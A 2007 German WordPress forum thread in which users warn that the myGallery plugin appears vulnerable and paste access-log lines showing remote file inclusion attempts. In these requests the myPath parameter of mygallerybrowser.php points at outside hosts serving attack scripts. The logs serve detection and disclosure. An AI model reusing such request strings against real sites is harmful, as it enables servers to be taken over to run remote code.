Warnung vor myGallery

  • Ich möchte zwar hier keine Pferde scheu machen oder sonstiges, aber so wie es aussieht ist wildbits -- myGallery auch in der aktuellen Version offen für Exploits.
    Wenn ich das richtig im Kopf habe, nicht das erste mal.

    Auf meinem Server hoste ich derzeit temporär einen, nennen wir es Gast, und seitdem habe ich deftige Probleme auf der Maschine.
    Ergo, Logfiles sichten.

    Just beim sichten spawnten 4 Perl-Prozesse welche sich die komplette CPU teilten.

    In den Logfiles finde ich Einträge ala:

    Code
    Gestern:
    217.133.11.130 - - [19/Jun/2007:20:59:17 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebtown.com/scan/evilx? HTTP/1.1" 302 423 "-" "libwww-perl/5.65"
    217.133.11.130 - - [19/Jun/2007:20:59:17 +0200] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebtown.com/scan/evilx? HTTP/1.1" 302 423 "-" "libwww-perl/5.65"
    
    
    Heute:
    204.152.189.72 - - [21/Jun/2007:14:25:09 +0200] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://200.14.236.50/intranet/img/c.txt?\r HTTP/1.1" 302 - "-" "curl/7.9.8 (i386-redhat-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.7a) (ipv6 enabled)"

    und

    Gestern wurde das Plugin (2 mal, da 2 Blogs auf der Domain) auf die aktuelle Version geupdated, aber heute dann wieder solch ein Verhalten/Aufruf/etc.

    Deswegen meine Vermutung das myGallery verwundbar ist, und wenn ich mir die geladenen URL/txt anschaue wird mir ganz anders.

    Vielleicht kann dies Jemand bestätigen oder evt. mal in seinen Logs nachprüfen.

    Ich persönlich setze dieses Plugin nicht ein, kann deswegen auch nicht viel dazu sagen.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich kann das Problem auf meinem Blog (WP 2.2.0, mygallery 1.4b6) nicht nachstellen, aber die einträge im access log habe ich auch und nicht zu knapp:

    Code
    194.105.128.149 - - [17/Jun/2007:08:59:38 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tritonzao.by.ru/echo.txt? HTTP/1.1" 302 - "-" "libwww-perl/5.805"
    194.105.128.149 - - [17/Jun/2007:08:59:38 +0200] "GET /wp-login.php?redirect_to=%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Fwww.tritonzao.by.ru%2Fecho.txt%3F HTTP/1.1" 200 2063 "-" "libwww-perl/5.805"

    Es wird definitiv versucht da irgendwas auszunutzen, was genau kann ich aber nicht sagen. Eventuell ist es die kombination von WP Version und MyGallery, da die Einträge sich alle gezielt auf mygallerybrowser.php beziehen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!